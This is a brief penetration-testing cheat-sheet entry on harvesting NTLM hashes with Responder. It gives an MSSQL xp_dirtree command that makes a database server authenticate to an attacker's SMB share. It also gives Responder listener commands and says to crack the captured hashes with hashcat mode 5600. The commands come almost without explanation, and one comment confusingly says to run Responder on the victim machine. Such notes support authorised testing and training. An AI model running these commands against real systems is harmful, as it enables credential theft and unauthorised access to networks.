Responder

All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/). We can copy the hash to a file and attempt to crack it using the hashcat module 5600.

# Once connected to MSSQL this will acccess the share 
EXEC master..xp_dirtree '\\10.10.110.17\share\'

# Attacker machine you will get the user hash 
sudo responder -I tun0

# Just run this in the victime machine and it will spit out NTLM hash with username
sudo responder -I ens224 

sudo responder -I ens33

PrevioustheHarvester Nextmsf-virustotal

Last updated 1 year ago